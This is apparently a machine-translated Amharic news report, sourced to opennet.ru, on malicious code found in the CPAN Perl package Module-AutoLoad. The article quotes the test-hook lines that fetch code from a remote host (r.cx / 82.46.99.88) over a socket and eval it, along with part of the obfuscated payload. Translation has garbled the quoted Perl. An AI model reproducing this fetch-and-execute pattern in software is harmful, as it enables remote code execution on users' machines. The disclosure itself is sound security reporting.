በሞዱል-AutoLoad Perl ጥቅል ውስጥ ተንኮል-አዘል ኮድ ተገኝቷል

በሲፒኤን ማውጫ በኩል በተሰራጨ የፐርል ጥቅል ውስጥ ሞዱል-ራስ-ሰር ጭነትበበረራ ላይ የሲፒኤን ሞጁሎችን በራስ ሰር ለመጫን የተነደፈ፣ ተለይቷል ተንኮል አዘል ኮድ. ተንኮል አዘል አስገባ ነበር። ተገኝቷል በሙከራ ኮድ ውስጥ 05_rcx.tከ 2011 ጀምሮ በመርከብ ላይ ያለው።
አጠያያቂ ኮድ መጫንን በተመለከተ ጥያቄዎች መነሳታቸው ትኩረት የሚስብ ነው። Stackoverflow በ2016 ተመልሷል።

ሞጁሉን በሚጭንበት ጊዜ የተጀመረውን የሙከራ ስብስብ በሚፈፀምበት ጊዜ ተንኮል-አዘል እንቅስቃሴ ከሶስተኛ ወገን አገልጋይ (http://r.cx: 1/) ኮድ ለማውረድ እና ለማስፈፀም ወደሚሞከርበት ሙከራ ይደርሳል። መጀመሪያ ላይ ከውጪው አገልጋይ የወረደው ኮድ ተንኮል አዘል አልነበረም ተብሎ ይታሰባል፣ አሁን ግን ጥያቄው ወደ ww.limera1n.com ጎራ ተዘዋውሯል፣ ይህም የኮዱን የማስፈጸሚያ ክፍል ያቀርባል።

ማውረዱን በፋይል ለማደራጀት። 05_rcx.t የሚከተለው ኮድ ጥቅም ላይ ይውላል:

የእኔ $prog = __FILE__;
$prog =~ ሰ{[^/]+\.t}{../contrib/RCX.pl}x;
የእኔ $ try = `$^X $prog`;

የተገለጸው ኮድ ስክሪፕቱ እንዲተገበር ያደርገዋል ../contrib/RCX.plይዘቱ ወደ መስመሩ የተቀነሰባቸው፡-

ይጠቀሙ lib do{eval<$b>&&botstrap("RCX")if$b=አዲስ አይኦ::ሶኬት::INET 82.46.99.88::":1″};

ይህ ስክሪፕት ይጫናል። ግራ መጋባት አገልግሎቱን በመጠቀም perlobfuscator.com ኮድ ከውጪው አስተናጋጅ r.cx (የቁምፊ ኮዶች 82.46.99.88 ከ "R.cX" ጽሑፍ ጋር ይዛመዳሉ) እና በ eval block ውስጥ ያስፈጽማል.

$ perl -MIO:: ሶኬት -e'$b=አዲስ አይኦ:: ሶኬት:: INET 82.46.99.88::":1"; ማተም <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

ከማሸጊያው በኋላ የሚከተለው በመጨረሻ ይከናወናል፡- ኮድ:

አትም
";evalor መመለስ ያስጠነቅቃል$@ እያለ$b;1

ችግር ያለበት ጥቅል አሁን ከማጠራቀሚያው ተወግዷል። ለአፍታ (የፐርል ደራሲዎች ሰቀላ አገልጋይ)፣ እና የሞጁሉ ደራሲ መለያ ታግዷል። በዚህ ሁኔታ, ሞጁሉ አሁንም ይቀራል ይገኛል በMetaCPAN መዝገብ ውስጥ እና አንዳንድ እንደ cpanminus ያሉ መገልገያዎችን በመጠቀም ከMetaCPAN በቀጥታ ሊጫኑ ይችላሉ። ይጠቀሳልጥቅሉ በስፋት እንዳልተሰራጨ።

ለመወያየት የሚስብ ተገናኝቷል እና የሞጁሉ ደራሲ, የእሱ ጣቢያ "r.cx" ከተጠለፈ በኋላ ተንኮል-አዘል ኮድ መግባቱን መረጃውን ውድቅ አደረገው እና ​​እሱ እየተዝናና እንደሆነ ገልጿል, እና perlobfuscator.com የሆነ ነገር ለመደበቅ ሳይሆን መጠኑን ለመቀነስ ተጠቅሞበታል. የኮዱ እና ቅጂውን በቅንጥብ ሰሌዳው በኩል ቀላል ማድረግ። የ “botstrap” የተግባር ስም ምርጫ የሚብራራው ይህ ቃል “ቦት የሚመስል እና ከቡትስትራፕ አጭር ነው” በሚለው እውነታ ነው። የሞጁሉ ደራሲ በተጨማሪም ተለይተው የታወቁ ማጭበርበሮች ተንኮል አዘል ድርጊቶችን እንደማይፈጽሙ አረጋግጠዋል, ነገር ግን በ TCP በኩል ኮድ መጫን እና አፈፃፀምን ብቻ ያሳያሉ.

ምንጭ: opennet.ru

አስተያየት ያክሉ